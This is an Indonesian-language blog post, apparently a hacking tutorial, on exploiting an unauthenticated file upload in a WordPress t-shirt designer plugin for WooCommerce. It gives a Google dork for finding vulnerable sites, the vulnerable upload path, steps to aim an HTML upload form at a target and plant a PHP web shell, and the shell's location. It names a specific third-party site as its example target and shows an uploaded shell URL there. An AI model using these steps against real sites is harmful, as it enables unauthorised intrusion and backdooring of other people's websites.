Bahan-bahan :
HTML Exploiter Click | save dengan format .html
Vulnerability :
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
Dork :
inurl:wp-content/plugins/woocommerce-custom-t-shirt-designer
Shell Location :
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php
Langkah-langkah :
Oke, langsung saja ke google nyari target vuln.
Contoh target saya adalah http://mbrinformatique.com/
Ubah url nya menjadi
http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
Jika error, berarti vuln
Langkah kedua, buka HTML Exploiter diatas dan edit bagian http://127.0.0.1/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php dengan web yang vuln.
save kembali lalu buka lewat browser.
nah tuh, upload shell nya lewat situ. maka kalo sudah sukses kalian akan mendapatkan nama acak. Misal :
xadsadadadaad.php
maka letak shell kalian ada di
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php
Contoh :
http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/1384522165528621b5f41fe.php
Kalo sudah seperti ituya terserah mau diapain
Sekian Tutornya, Semoga bermanfaat
Tidak ada komentar:
Posting Komentar